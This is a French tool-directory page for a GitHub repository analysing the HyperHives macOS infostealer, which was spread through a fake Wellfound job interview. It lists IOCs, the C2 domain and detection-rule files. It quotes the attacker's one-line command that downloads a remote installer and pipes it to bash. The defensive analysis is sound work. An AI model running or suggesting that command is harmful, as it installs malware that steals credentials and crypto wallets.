Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
hyperhives-macos-infostealer-analysis — Analyse statique complète du voleur d'informations HyperHives macOS Rust — 571 valeurs de configuration déchiffrées, infrastructure C2, attribution DPRK/Contagious Interview, règles YARA/Sigma, bundle STIX 2.1, couche ATT&CK Navigator | Kitploit
Outils/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Gestion des Indicateurs de Compromission (IOC)OSINT (Renseignement de Sources Ouvertes)Rétro-ingénierieAnalyse ForensiqueAnalyse de MalwareRenseignement sur les MenacesArticles et RechercheApprentissage et ÉducationRessources Organisées

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Analyse statique complète du voleur d'informations HyperHives macOS Rust — 571 valeurs de configuration déchiffrées, infrastructure C2, attribution DPRK/Contagious Interview, règles YARA/Sigma, bundle STIX 2.1, couche ATT&CK Navigator

Voir le dépôtSite web
31413il y a 5 moisVérifié par Kitploit
Partager

HyperHives macOS Infostealer — Analyse technique complète

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Renseignement sur les menaces : Infostealer binaire universel Rust pour macOS distribué via un faux pipeline d'entretien d'embauche sur Wellfound (anciennement AngelList). Le personnage de l'opérateur « Felix » d'« HyperHive » a incité les cibles à exécuter un installateur malveillant depuis macos.hyperhives.net. Ce dépôt documente une analyse statique complète : 571 valeurs de configuration chiffrées récupérées, comprenant des URL C2, un DSN Sentry, et 276 ID d'extensions Chrome ciblées.

SHA-256 de l'échantillon5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
Domaine C2cloudproxy.link
Domaine de livraisonmacos.hyperhives.net
Plateforme d'appâtWellfound (anciennement AngelList)
Personnage de l'opérateur« Felix » chez « HyperHive »
VirusTotal9 / 63 détections
ClassificationDivulgation publique / lot d'IOC
Dernière mise à jourAvril 2026

Sommaire

  • Paquets de renseignement sur les menaces
  • Structure du dépôt
  • Démarrage rapide
  • TL;DR
  • 1 — Comment tout a commencé
  • 2 — Le binaire
  • 3 — Ce qu'il vole
  • 4 — Infrastructure C2 déchiffrée
  • 5 — Attribution
  • 6 — Cryptanalyse
  • 7 — Cartographie MITRE ATT&CK
  • 8 — Référence des portefeuilles et ID d'extensions
  • 9 — Actions recommandées
  • 10 — Méthodologie
  • Annexe A — Les 276 ID d'extensions Chrome
  • Portée et limites
  • Historique des versions
  • Contribuer
  • Licence

Paquets de renseignement sur les menaces

FichierFormatObjectif
iocs.txtTexte brutHachages, domaines, URLs, IPs, email, IDs Sentry — à coller dans des listes de blocage, MISP, OpenCTI
yara_rules.yarYARA 4.2+Correspondance de hachage d'échantillon connu + détections heuristiques de chaînes pour Mach-O
sigma_rules.ymlSigmaRègles de proxy, DNS et création de processus — ajustez logsource pour votre SIEM
stix/bundle.jsonSTIX 2.1Paquet CTI lisible par machine avec indicateurs, SDO de logiciel malveillant, infrastructure, motifs ATT&CK et relations
attack-navigator-layer.jsonATT&CK NavigatorImportez dans ATT&CK Navigator pour une couverture visuelle des techniques

Structure du dépôt```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## Démarrage rapide

Placez l'échantillon en tant que `sample/installer_binary` (consultez [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) pour la vérification de hachage), puis :```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

Le fichier compose impose network_mode: none, read_only: true, et supprime toutes les capacités Linux. Voir SECURITY.md pour les directives complètes de gestion.


TL;DR

Une offre d'emploi sur Wellfound (anciennement AngelList) a conduit à une chaîne d'ingénierie sociale par plusieurs e-mails de la part d'un opérateur sous le personnage "Felix" chez "HyperHive". Après avoir flatté le parcours technique de la cible et planifié un faux entretien, l'attaquant a dirigé la victime pour « passer en revue le produit » sur hyperhives.net et examiner spécifiquement Paramètres → Diagnostics → Journal — un prétexte pour déclencher l'exécution de :``` curl -s https://macos.hyperhives.net/install | nohup bash &

La charge utile est un **binaire universel Mach-O de 8,5 Mo** (x86_64 + arm64) compilé en Rust. L’analyse statique avec un laboratoire Docker déconnecté et l’émulation CPU de **570 routines d’assistance x86_64 uniques** a récupéré **la totalité des 571 valeurs de configuration chiffrées**, révélant :

- **C2 :** `cloudproxy.link` — quatre points de terminaison HTTPS
- **Sentry (pivot d’attribution) :** DSN complet avec identifiants d’org/projet sur `ingest.de.sentry.io`
- **Identité de construction :** utilisateur Cargo `rootr`, nom de code `force`, version `9.12.1`
- **Cibles :** 276 identifiants d’extension Chrome (portefeuilles crypto, gestionnaires de mots de passe, identifiants d’entreprise)
Télécharger l’outil